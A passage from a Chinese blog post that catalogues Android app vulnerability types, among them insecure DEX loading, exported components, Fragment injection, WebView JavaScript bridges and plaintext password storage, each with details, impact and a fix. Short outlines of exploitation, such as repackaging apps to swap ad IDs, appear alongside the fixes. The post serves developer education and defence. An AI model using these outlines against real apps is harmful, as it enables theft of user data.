<p>建议：NDK编译so时，加入LOCAL_CFLAGS := -fpie -pie开启对PIE的支持。</p>
<h2 id="libupnp栈溢出漏洞"><a href="#libupnp栈溢出漏洞" class="headerlink" title="libupnp栈溢出漏洞"></a>libupnp栈溢出漏洞</h2><p>详情：使用了低于1.6.18版本的libupnp库文件。</p>
<p>危害：代码执行。</p>
<p>建议：升级库到1.6.18版本或以上。</p>
<h1 id="动态类漏洞"><a href="#动态类漏洞" class="headerlink" title="动态类漏洞"></a>动态类漏洞</h1><h2 id="DEX文件动态加载"><a href="#DEX文件动态加载" class="headerlink" title="DEX文件动态加载"></a>DEX文件动态加载</h2><p>详情：使用DEXClassLoader加载外部apk，dex等文件，外部文件无法控制时，无法保证加载的文件是否安全。</p>
<p>危害：加载恶意dex文件会导致任意命令的执行。</p>
<p>建议：加载外部文件前，必须使用校验签名或MD5等方式确认外部文件的安全性。</p>
<h2 id="动态注册广播"><a href="#动态注册广播" class="headerlink" title="动态注册广播"></a>动态注册广播</h2><p>详情：使用registerReceiver动态注册的广播在组件的生命周期里是默认导出的。</p>
<p>危害：拒绝服务、数据泄露、越权调用。</p>
<p>建议：使用带权限检验的registerReceiver API进行动态广播的注册。</p>
<h1 id="校验或限定不严导致的风险或漏洞"><a href="#校验或限定不严导致的风险或漏洞" class="headerlink" title="校验或限定不严导致的风险或漏洞"></a>校验或限定不严导致的风险或漏洞</h1><h2 id="Fragment注入"><a href="#Fragment注入" class="headerlink" title="Fragment注入"></a>Fragment注入</h2><p>详情：通过导出的PreferenceActivity的子类，没有正确处理intent的extra值。</p>
<p>危害：攻击者可绕过限制访问未授权页面。</p>
<p>建议：使用isValidFragment方法中进行fragment名的合法性校验。</p>
<h2 id="隐式意图调用"><a href="#隐式意图调用" class="headerlink" title="隐式意图调用"></a>隐式意图调用</h2><p>详情：封装Intent时采用隐式设置，只设定action，未限定具体的接受对象，导致intent可被其他应用获取并读取其中的数据。</p>
<p>危害：Intent被第三方劫持，导致内部隐私数据泄漏。</p>
<p>建议：改为显示调用。</p>
<h1 id="命令行调用类相关的风险或漏洞"><a href="#命令行调用类相关的风险或漏洞" class="headerlink" title="命令行调用类相关的风险或漏洞"></a>命令行调用类相关的风险或漏洞</h1><h2 id="动态链接库中包含执行命令的函数"><a href="#动态链接库中包含执行命令的函数" class="headerlink" title="动态链接库中包含执行命令的函数"></a>动态链接库中包含执行命令的函数</h2><p>详情：native程序，执行系统命令时，对接收的参数执行命令时没有做过滤或检验。</p>
<p>危害：攻击者传入任意命令，导致命令执行。</p>
<p>建议：对参数进行严格过滤。</p>
<h2 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h2><h2 id="应用反编译"><a href="#应用反编译" class="headerlink" title="应用反编译"></a>应用反编译</h2><p><strong>漏洞</strong>：APK 包非常容易被反编译成可读文件，稍加修改就能重新打包成新的 APK。<br><strong>利用</strong>：软件破解，内购破解，软件逻辑修改，插入恶意代码，替换广告商 ID。<br><strong>建议</strong>：使用 ProGuard 等工具混淆代码，重要逻辑用 NDK 实现。<br><strong>例子</strong>：反编译重打包 FlappyBird，把广告商 ID 换了，游戏改加插一段恶意代码等等。</p>
<h2 id="数据的存储与传输"><a href="#数据的存储与传输" class="headerlink" title="数据的存储与传输"></a>数据的存储与传输</h2><p><strong>漏洞</strong>：外部存储（SD 卡）上的文件没有权限管理，所有应用都可读可写。开发者把敏感信息明文存在 SD 卡上，或者动态加载的 payload 放在 SD 卡上。<br><strong>利用</strong>：窃取敏感信息，篡改配置文件，修改 payload 逻辑并重打包。<br><strong>建议</strong>：不要把敏感信息放在外部存储上面；在动态加载外部资源的时候验证文件完整性。</p>
<p><strong>漏洞</strong>：使用全局可读写（MODE_WORLD_READABLE，MODE_WORLD_WRITEABLE）的内部存储方式，或明文存储敏感信息（用户账号密码等）。<br><strong>利用</strong>：全局读写敏感信息，或 root 后读取明文信息。<br><strong>建议</strong>：不适用全局可读写的内部存储方式，不明文存储用户账号密码。</p>
<h2 id="密码泄露"><a href="#密码泄露" class="headerlink" title="密码泄露"></a>密码泄露</h2><p><strong>漏洞</strong>：密码明文存储，传输。<br><strong>利用</strong>：</p>
<ul>
<li>root 后可读写内部存储。</li>
<li>SD 卡全局可读写。</li>
<li>公共 WiFi 抓包获取账号密码。</li>
</ul>
<p><strong>建议</strong>：实用成熟的加密方案。不要把密码明文存储在 SD 卡上。</p>
<h2 id="组件暴露-Activity-Service-Broadcast-Receiver-Content-Provider"><a href="#组件暴露-Activity-Service-Broadcast-Receiver-Content-Provider" class="headerlink" title="组件暴露 (Activity, Service, Broadcast Receiver, Content Provider)"></a>组件暴露 (Activity, Service, Broadcast Receiver, Content Provider)</h2><p><strong>漏洞</strong>：</p>
<ul>
<li>组件在被调用时未做验证。</li>
<li>在调用其他组件时未做验证。</li>
</ul>
<p><strong>利用</strong>：</p>
<ul>
<li>调用暴露的组件，达到某种效果，获取某些信息，构造某些数据。（比如：调用暴露的组件发短信、微博等）。</li>
<li>监听暴露组件，读取数据。</li>
</ul>
<p><strong>建议</strong>：验证输入信息、验证组件调用等。android:exported 设置为 false。使用 android:protectionLevel=”signature” 验证调用来源。</p>
<h2 id="WebView"><a href="#WebView" class="headerlink" title="WebView"></a>WebView</h2><p><strong>漏洞</strong>：</p>
<ul>
<li>恶意 App 可以注入 JavaScript 代码进入 WebView 中的网页，网页未作验证。</li>
<li>恶意网页可以执行 JavaScript 反过来调用 App 中注册过的方法，或者使用资源。</li>
</ul>
<p><strong>利用</strong>：</p>
<ul>
<li>恶意程序嵌入 Web App，然后窃取用户信息。</li>
<li>恶意网页远程调用 App 代码。更有甚者，通过 Java Reflection 调用 Runtime 执行任意代码。</li>
</ul>
<p><strong>建议</strong>：不使用 WebView 中的 setJavaScriptEnabled(true)，或者使用时对输入进行验证。</p>
<h2 id="其他漏洞"><a href="#其他漏洞" class="headerlink" title="其他漏洞"></a>其他漏洞</h2><ul>
<li>ROOT 后的手机可以修改 App 的内购，或者安装外挂 App 等。</li>
<li>Logcat 泄露用户敏感信息。</li>
<li>恶意的广告包。</li>
<li>利用 next Intent。</li>
</ul>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>Android 应用的漏洞大部分都是因为开发人员没有对输入信息做验证造成的，另外因为 Intent 这种特殊的机制，需要过滤外部的各种恶意行为。再加上 Android 应用市场混乱。所以现在 Android 应用的漏洞，恶意软件，钓鱼等还在不断增多。再加上 root 对于 App 沙箱的破坏，Android 升级的限制。</p>
<p>文章：<a target="_blank" rel="noopener" href="https://www.zhihu.com/question/22933619">https://www.zhihu.com/question/22933619</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E7%AC%94%E8%AE%B0/">笔记</a>
                    
                      <a class="hover-with-bg" href="/categories/%E7%AC%94%E8%AE%B0/Android%E9%80%86%E5%90%91/">Android逆向</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/Android%E9%80%86%E5%90%91/">Android逆向</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/03/16/%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4%E8%AE%B0%E5%BD%95/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">常用命令记录</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/03/14/Android%E8%BD%AF%E4%BB%B6%E7%9A%84%E7%A0%B4%E8%A7%A3%E6%8A%80%E6%9C%AF/">
                        <span class="hidden-mobile">Android软件的破解技术</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
